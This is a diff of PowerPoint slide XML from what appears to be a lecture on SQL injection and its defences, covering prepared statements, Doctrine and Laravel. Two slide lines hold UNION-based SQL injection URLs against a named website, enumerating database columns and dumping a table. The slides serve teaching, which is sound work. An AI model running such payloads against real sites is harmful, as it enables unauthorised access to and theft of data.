+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" marR="0" lvl="1" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPts val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+              <a:buClrTx/>
+              <a:buSzTx/>
+              <a:buFontTx/>
+              <a:buNone/>
+              <a:tabLst/>
+              <a:defRPr/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>7. </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" i="1" baseline="0" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>http://www.raahauges.com/view-news.php?id=null union all select 1,2,group_concat(</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" i="1" baseline="0" dirty="0" err="1" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>column_name</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" i="1" baseline="0" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>),4,5 from </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" i="1" baseline="0" dirty="0" err="1" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>information_schema.columns</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" i="1" baseline="0" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t> where </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" i="1" baseline="0" dirty="0" err="1" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>table_schema</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" i="1" baseline="0" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>=database() –</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" marR="0" lvl="1" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPts val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+              <a:buClrTx/>
+              <a:buSzTx/>
+              <a:buFontTx/>
+              <a:buNone/>
+              <a:tabLst/>
+              <a:defRPr/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" i="1" baseline="0" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>8. http://www.raahauges.com/view-news.php?id=null union all select 1,2,group_concat(date,0x3a,time,0x3a,title,0x3a,details),4,5 from events --</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" marR="0" lvl="1" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPts val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+              <a:buClrTx/>
+              <a:buSzTx/>
+              <a:buFontTx/>
+              <a:buNone/>
+              <a:tabLst/>
+              <a:defRPr/>
+            </a:pPr>
+            <a:endParaRPr lang="en-US" i="1" dirty="0" smtClean="0">
+              <a:solidFill>
+                <a:schemeClr val="tx1"/>
+              </a:solidFill>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" marR="0" lvl="1" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPts val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+              <a:buClrTx/>
+              <a:buSzTx/>
+              <a:buFontTx/>
+              <a:buNone/>
+              <a:tabLst/>
+              <a:defRPr/>
+            </a:pPr>
+            <a:endParaRPr lang="en-US" i="0" dirty="0" smtClean="0">
+              <a:solidFill>
+                <a:schemeClr val="tx1"/>
+              </a:solidFill>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldNum" sz="quarter" idx="10"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:fld id="{35845946-0CF3-4C0F-AF5C-F563F65A0652}" type="slidenum">
+              <a:rPr lang="en-US" smtClean="0"/>
+              <a:pPr/>
+              <a:t>26</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
@@ -7153,7 +7627,7 @@
             <a:fld id="{BC3ED275-7153-994E-99D9-5909A673DFFD}" type="datetime2">
               <a:rPr lang="en-US" smtClean="0"/>
               <a:pPr/>
-              <a:t>Tuesday, April 28, 2015</a:t>
+              <a:t>Wednesday, May 06, 2015</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
@@ -7348,7 +7822,7 @@
             <a:fld id="{604E6C61-ACAA-C24F-8F8A-3369455B37E6}" type="datetime2">
               <a:rPr lang="en-US" smtClean="0"/>
               <a:pPr/>
-              <a:t>Tuesday, April 28, 2015</a:t>
+              <a:t>Wednesday, May 06, 2015</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
@@ -7553,7 +8027,7 @@
             <a:fld id="{6081A34F-7B18-5F4C-91E8-15A0B2DB6558}" type="datetime2">
               <a:rPr lang="en-US" smtClean="0"/>
               <a:pPr/>
-              <a:t>Tuesday, April 28, 2015</a:t>
+              <a:t>Wednesday, May 06, 2015</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
@@ -7758,7 +8232,7 @@
             <a:fld id="{C5608FE6-F300-CA4F-8754-F30BE5DB2C02}" type="datetime2">
               <a:rPr lang="en-US" smtClean="0"/>
               <a:pPr/>
-              <a:t>Tuesday, April 28, 2015</a:t>
+              <a:t>Wednesday, May 06, 2015</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
@@ -8029,7 +8503,7 @@
             <a:fld id="{35907637-DE80-574B-9387-2B6489C2DDA9}" type="datetime2">
               <a:rPr lang="en-US" smtClean="0"/>
               <a:pPr/>
-              <a:t>Tuesday, April 28, 2015</a:t>
+              <a:t>Wednesday, May 06, 2015</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
@@ -8347,7 +8821,7 @@
             <a:fld id="{B29FAD1F-AC8E-0749-90DA-216529CFB27D}" type="datetime2">
               <a:rPr lang="en-US" smtClean="0"/>
               <a:pPr/>
-              <a:t>Tuesday, April 28, 2015</a:t>
+              <a:t>Wednesday, May 06, 2015</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
@@ -8799,7 +9273,7 @@
             <a:fld id="{C14BE83E-0675-4D45-9588-77AC2712A327}" type="datetime2">
               <a:rPr lang="en-US" smtClean="0"/>
               <a:pPr/>
-              <a:t>Tuesday, April 28, 2015</a:t>
+              <a:t>Wednesday, May 06, 2015</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
@@ -8947,7 +9421,7 @@
             <a:fld id="{2A00E04D-79B7-6D41-BB08-435F493F6C30}" type="datetime2">
               <a:rPr lang="en-US" smtClean="0"/>
               <a:pPr/>
-              <a:t>Tuesday, April 28, 2015</a:t>
+              <a:t>Wednesday, May 06, 2015</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
@@ -9067,7 +9541,7 @@
             <a:fld id="{46027C3B-ABCB-0249-A4FA-2A37469F1C4E}" type="datetime2">
               <a:rPr lang="en-US" smtClean="0"/>
               <a:pPr/>
-              <a:t>Tuesday, April 28, 2015</a:t>
+              <a:t>Wednesday, May 06, 2015</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
@@ -9369,7 +9843,7 @@
             <a:fld id="{2EF7263A-B695-E045-B371-427CE3BBD559}" type="datetime2">
               <a:rPr lang="en-US" smtClean="0"/>
               <a:pPr/>
-              <a:t>Tuesday, April 28, 2015</a:t>
+              <a:t>Wednesday, May 06, 2015</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
@@ -9653,7 +10127,7 @@
             <a:fld id="{E88F21D5-8A27-D144-BD56-2E0DA25B6EEB}" type="datetime2">
               <a:rPr lang="en-US" smtClean="0"/>
               <a:pPr/>
-              <a:t>Tuesday, April 28, 2015</a:t>
+              <a:t>Wednesday, May 06, 2015</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
@@ -9919,7 +10393,7 @@
             <a:fld id="{3634E6B9-A6FC-5D46-BEFB-60D025A07933}" type="datetime2">
               <a:rPr lang="en-US" smtClean="0"/>
               <a:pPr/>
-              <a:t>Tuesday, April 28, 2015</a:t>
+              <a:t>Wednesday, May 06, 2015</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
@@ -10529,7 +11003,7 @@
                 </a:solidFill>
               </a:rPr>
               <a:pPr/>
-              <a:t>Tuesday, April 28, 2015</a:t>
+              <a:t>Wednesday, May 06, 2015</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US" dirty="0">
               <a:solidFill>
@@ -10737,7 +11211,7 @@
                 </a:solidFill>
               </a:rPr>
               <a:pPr/>
-              <a:t>Tuesday, April 28, 2015</a:t>
+              <a:t>Wednesday, May 06, 2015</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US" dirty="0">
               <a:solidFill>
@@ -11209,11 +11683,6 @@
               </a:rPr>
               <a:t>Not a good idea</a:t>
             </a:r>
-            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
-              <a:solidFill>
-                <a:schemeClr val="tx1"/>
-              </a:solidFill>
-            </a:endParaRPr>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -11317,7 +11786,7 @@
                 </a:solidFill>
               </a:rPr>
               <a:pPr/>
-              <a:t>Tuesday, April 28, 2015</a:t>
+              <a:t>Wednesday, May 06, 2015</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US" dirty="0">
               <a:solidFill>
@@ -11888,11 +12357,6 @@
               </a:rPr>
               <a:t>For a free form fields =&gt; a bad idea</a:t>
             </a:r>
-            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
-              <a:solidFill>
-                <a:schemeClr val="tx1"/>
-              </a:solidFill>
-            </a:endParaRPr>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -11972,7 +12436,7 @@
                 </a:solidFill>
               </a:rPr>
               <a:pPr/>
-              <a:t>Tuesday, April 28, 2015</a:t>
+              <a:t>Wednesday, May 06, 2015</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US" dirty="0">
               <a:solidFill>
@@ -12598,7 +13062,7 @@
                 </a:solidFill>
               </a:rPr>
               <a:pPr/>
-              <a:t>Tuesday, April 28, 2015</a:t>
+              <a:t>Wednesday, May 06, 2015</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US" dirty="0">
               <a:solidFill>
@@ -13270,7 +13734,7 @@
                 </a:solidFill>
               </a:rPr>
               <a:pPr/>
-              <a:t>Tuesday, April 28, 2015</a:t>
+              <a:t>Wednesday, May 06, 2015</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US" dirty="0">
               <a:solidFill>
@@ -13897,7 +14361,7 @@
                 </a:solidFill>
               </a:rPr>
               <a:pPr/>
-              <a:t>Tuesday, April 28, 2015</a:t>
+              <a:t>Wednesday, May 06, 2015</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US" dirty="0">
               <a:solidFill>
@@ -14524,7 +14988,7 @@
                 </a:solidFill>
               </a:rPr>
               <a:pPr/>
-              <a:t>Tuesday, April 28, 2015</a:t>
+              <a:t>Wednesday, May 06, 2015</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US" dirty="0">
               <a:solidFill>
@@ -14618,7 +15082,7 @@
         </p:nvSpPr>
         <p:spPr bwMode="auto">
           <a:xfrm>
-            <a:off x="191928" y="801215"/>
+            <a:off x="88232" y="1027460"/>
             <a:ext cx="8720218" cy="1143000"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
@@ -14774,7 +15238,7 @@
                 <a:latin typeface="Constantia"/>
                 <a:cs typeface="Constantia"/>
               </a:rPr>
-              <a:t>Framework</a:t>
+              <a:t>Doctrine</a:t>
             </a:r>
             <a:endParaRPr lang="en-US" sz="4000" dirty="0">
               <a:latin typeface="Constantia"/>
@@ -15053,7 +15517,7 @@
       </p:sp>
       <p:pic>
         <p:nvPicPr>
-          <p:cNvPr id="10" name="Picture 9"/>
+          <p:cNvPr id="6" name="Picture 5"/>
           <p:cNvPicPr>
             <a:picLocks noChangeAspect="1"/>
           </p:cNvPicPr>
@@ -15067,8 +15531,8 @@
         </p:blipFill>
         <p:spPr>
           <a:xfrm>
-            <a:off x="1066800" y="1729921"/>
-            <a:ext cx="7379616" cy="4868228"/>
+            <a:off x="406200" y="2304956"/>
+            <a:ext cx="8331599" cy="3973295"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -15078,7 +15542,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3765835539"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1366211618"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -15151,7 +15615,7 @@
                 </a:solidFill>
               </a:rPr>
               <a:pPr/>
-              <a:t>Tuesday, April 28, 2015</a:t>
+              <a:t>Wednesday, May 06, 2015</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US" dirty="0">
               <a:solidFill>
@@ -15245,7 +15709,7 @@
         </p:nvSpPr>
         <p:spPr bwMode="auto">
           <a:xfrm>
-            <a:off x="88232" y="1027460"/>
+            <a:off x="191928" y="1018034"/>
             <a:ext cx="8720218" cy="1143000"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
@@ -15401,7 +15865,7 @@
                 <a:latin typeface="Constantia"/>
                 <a:cs typeface="Constantia"/>
               </a:rPr>
-              <a:t>Doctrine</a:t>
+              <a:t>Why it works?</a:t>
             </a:r>
             <a:endParaRPr lang="en-US" sz="4000" dirty="0">
               <a:latin typeface="Constantia"/>
@@ -15420,8 +15884,8 @@
         </p:nvSpPr>
         <p:spPr bwMode="auto">
           <a:xfrm>
-            <a:off x="191928" y="2161034"/>
-            <a:ext cx="8671710" cy="4369962"/>
+            <a:off x="457200" y="2161034"/>
+            <a:ext cx="8229600" cy="4369962"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -15615,22 +16079,14 @@
               <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
               <a:buChar char="•"/>
             </a:pPr>
-            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
-              <a:solidFill>
-                <a:srgbClr val="0000FF"/>
-              </a:solidFill>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr marL="342900" indent="-342900" algn="l">
-              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
-              <a:buChar char="•"/>
-            </a:pPr>
-            <a:endParaRPr lang="en-US" dirty="0">
-              <a:solidFill>
-                <a:srgbClr val="0000FF"/>
-              </a:solidFill>
-            </a:endParaRPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>Old way: send mixing of query and data</a:t>
+            </a:r>
           </a:p>
           <a:p>
             <a:pPr marL="342900" indent="-342900" algn="l">
@@ -15639,7 +16095,7 @@
             </a:pPr>
             <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
               <a:solidFill>
-                <a:srgbClr val="0000FF"/>
+                <a:schemeClr val="tx1"/>
               </a:solidFill>
             </a:endParaRPr>
           </a:p>
@@ -15648,64 +16104,58 @@
               <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
               <a:buChar char="•"/>
             </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>New idea: query &amp; data </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>are sent to </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>SQL </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>server </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>separately</a:t>
+            </a:r>
             <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
               <a:solidFill>
-                <a:srgbClr val="0000FF"/>
+                <a:schemeClr val="tx1"/>
               </a:solidFill>
             </a:endParaRPr>
           </a:p>
-          <a:p>
-            <a:pPr marL="342900" indent="-342900" algn="l">
-              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
-              <a:buChar char="•"/>
-            </a:pPr>
-            <a:endParaRPr lang="en-US" dirty="0">
-              <a:solidFill>
-                <a:srgbClr val="0000FF"/>
-              </a:solidFill>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr marL="342900" indent="-342900" algn="l">
-              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
-              <a:buChar char="•"/>
-            </a:pPr>
-            <a:endParaRPr lang="en-US" dirty="0">
-              <a:solidFill>
-                <a:srgbClr val="0000FF"/>
-              </a:solidFill>
-            </a:endParaRPr>
-          </a:p>
         </p:txBody>
       </p:sp>
-      <p:pic>
-        <p:nvPicPr>
-          <p:cNvPr id="6" name="Picture 5"/>
-          <p:cNvPicPr>
-            <a:picLocks noChangeAspect="1"/>
-          </p:cNvPicPr>
-          <p:nvPr/>
-        </p:nvPicPr>
-        <p:blipFill>
-          <a:blip r:embed="rId3"/>
-          <a:stretch>
-            <a:fillRect/>
-          </a:stretch>
-        </p:blipFill>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="406200" y="2304956"/>
-            <a:ext cx="8331599" cy="3973295"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-      </p:pic>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1366211618"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="848504790"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -15778,7 +16228,7 @@
                 </a:solidFill>
               </a:rPr>
               <a:pPr/>
-              <a:t>Tuesday, April 28, 2015</a:t>
+              <a:t>Wednesday, May 06, 2015</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US" dirty="0">
               <a:solidFill>
@@ -15872,7 +16322,7 @@
         </p:nvSpPr>
         <p:spPr bwMode="auto">
           <a:xfrm>
-            <a:off x="191928" y="1018034"/>
+            <a:off x="191928" y="801215"/>
             <a:ext cx="8720218" cy="1143000"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
@@ -16028,7 +16478,21 @@
                 <a:latin typeface="Constantia"/>
                 <a:cs typeface="Constantia"/>
               </a:rPr>
-              <a:t>Why it works?</a:t>
+              <a:t>Framework (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="4000" dirty="0" err="1" smtClean="0">
+                <a:latin typeface="Constantia"/>
+                <a:cs typeface="Constantia"/>
+              </a:rPr>
+              <a:t>Laravel</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0">
+                <a:latin typeface="Constantia"/>
+                <a:cs typeface="Constantia"/>
+              </a:rPr>
+              <a:t>)</a:t>
             </a:r>
             <a:endParaRPr lang="en-US" sz="4000" dirty="0">
               <a:latin typeface="Constantia"/>
@@ -16047,8 +16511,8 @@
         </p:nvSpPr>
         <p:spPr bwMode="auto">
           <a:xfrm>
-            <a:off x="457200" y="2161034"/>
-            <a:ext cx="8229600" cy="4369962"/>
+            <a:off x="191928" y="2161034"/>
+            <a:ext cx="8671710" cy="4369962"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -16242,14 +16706,22 @@
               <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
               <a:buChar char="•"/>
             </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>Old way: send mixing of query and data</a:t>
-            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
+              <a:solidFill>
+                <a:srgbClr val="0000FF"/>
+              </a:solidFill>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr marL="342900" indent="-342900" algn="l">
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+            </a:pPr>
+            <a:endParaRPr lang="en-US" dirty="0">
+              <a:solidFill>
+                <a:srgbClr val="0000FF"/>
+              </a:solidFill>
+            </a:endParaRPr>
           </a:p>
           <a:p>
             <a:pPr marL="342900" indent="-342900" algn="l">
@@ -16258,7 +16730,7 @@
             </a:pPr>
             <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
               <a:solidFill>
-                <a:schemeClr val="tx1"/>
+                <a:srgbClr val="0000FF"/>
               </a:solidFill>
             </a:endParaRPr>
           </a:p>
@@ -16267,58 +16739,64 @@
               <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
               <a:buChar char="•"/>
             </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>New idea: query &amp; data </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>are sent to </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>SQL </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>server </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:srgbClr val="FF0000"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>separately</a:t>
-            </a:r>
             <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
               <a:solidFill>
-                <a:schemeClr val="tx1"/>
+                <a:srgbClr val="0000FF"/>
               </a:solidFill>
             </a:endParaRPr>
           </a:p>
+          <a:p>
+            <a:pPr marL="342900" indent="-342900" algn="l">
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+            </a:pPr>
+            <a:endParaRPr lang="en-US" dirty="0">
+              <a:solidFill>
+                <a:srgbClr val="0000FF"/>
+              </a:solidFill>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr marL="342900" indent="-342900" algn="l">
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+            </a:pPr>
+            <a:endParaRPr lang="en-US" dirty="0">
+              <a:solidFill>
+                <a:srgbClr val="0000FF"/>
+              </a:solidFill>
+            </a:endParaRPr>
+          </a:p>
         </p:txBody>
       </p:sp>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="10" name="Picture 9"/>
+          <p:cNvPicPr>
+            <a:picLocks noChangeAspect="1"/>
+          </p:cNvPicPr>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId3"/>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1066800" y="1729921"/>
+            <a:ext cx="7379616" cy="4868228"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+      </p:pic>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="848504790"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3765835539"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -16391,7 +16869,7 @@
                 </a:solidFill>
               </a:rPr>
               <a:pPr/>
-              <a:t>Monday, May 04, 2015</a:t>
+              <a:t>Wednesday, May 06, 2015</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US" dirty="0">
               <a:solidFill>
@@ -16485,7 +16963,7 @@
         </p:nvSpPr>
         <p:spPr bwMode="auto">
           <a:xfrm>
-            <a:off x="125944" y="857775"/>
+            <a:off x="88232" y="1027460"/>
             <a:ext cx="8720218" cy="1143000"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
@@ -16637,11 +17115,18 @@
           </a:lstStyle>
           <a:p>
             <a:r>
+              <a:rPr lang="en-US" sz="4000" dirty="0" err="1" smtClean="0">
+                <a:latin typeface="Constantia"/>
+                <a:cs typeface="Constantia"/>
+              </a:rPr>
+              <a:t>Laravel</a:t>
+            </a:r>
+            <a:r>
               <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0">
                 <a:latin typeface="Constantia"/>
                 <a:cs typeface="Constantia"/>
               </a:rPr>
-              <a:t>Tips</a:t>
+              <a:t> (Possible risk)</a:t>
             </a:r>
             <a:endParaRPr lang="en-US" sz="4000" dirty="0">
               <a:latin typeface="Constantia"/>
@@ -16660,8 +17145,8 @@
         </p:nvSpPr>
         <p:spPr bwMode="auto">
           <a:xfrm>
-            <a:off x="457200" y="1781667"/>
-            <a:ext cx="8229600" cy="4721048"/>
+            <a:off x="191928" y="2161034"/>
+            <a:ext cx="8671710" cy="4369962"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -16856,182 +17341,20 @@
               <a:buChar char="•"/>
             </a:pPr>
             <a:r>
-              <a:rPr lang="en-US" b="1" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="0070C0"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>Validation first </a:t>
-            </a:r>
-            <a:r>
               <a:rPr lang="en-US" dirty="0" smtClean="0">
                 <a:solidFill>
                   <a:schemeClr val="tx1"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>(mail, phone,… types)</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
-              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
-              <a:buChar char="•"/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
-                <a:solidFill>
